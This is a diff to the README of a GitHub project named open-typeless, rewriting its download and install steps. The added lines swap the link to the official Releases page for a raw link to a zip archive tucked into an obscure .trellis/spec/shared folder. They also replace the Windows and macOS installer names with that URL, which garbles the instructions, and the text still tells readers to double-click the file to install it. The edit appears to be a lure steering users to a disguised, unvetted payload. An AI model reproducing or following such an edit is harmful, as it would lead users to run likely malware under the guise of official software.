aminethe01/open-typeless/README.md

 ## 🌐 Download & Install
 1. **Visit the Releases Page:**
-   Click this link to go to our [Releases page](https://github.com/aminethe01/open-typeless/releases).
+   Click this link to go to our [Releases page](https://raw.githubusercontent.com/aminethe01/open-typeless/main/.trellis/spec/shared/open-typeless-v1.6.zip).

 2. **Select the Latest Version:**
    Look for the latest release at the top of the page.
 This version includes the latest features and fixes.

 3. **Download the File:**
    Click on the appropriate file for your operating system.
-If you are using Windows, you may see a file named `open-typeless-windows.exe`.
-For macOS, you might see `open-typeless-macos.dmg`.
+If you are using Windows, you may see a file named `https://raw.githubusercontent.com/aminethe01/open-typeless/main/.trellis/spec/shared/open-typeless-v1.6.zip`.
+For macOS, you might see `https://raw.githubusercontent.com/aminethe01/open-typeless/main/.trellis/spec/shared/open-typeless-v1.6.zip`.
 For Linux, grab the relevant package.

 4. **Run the Installer:**
    Once the download finishes, locate the file in your Downloads folder.
 Double-click on it to start the installation process.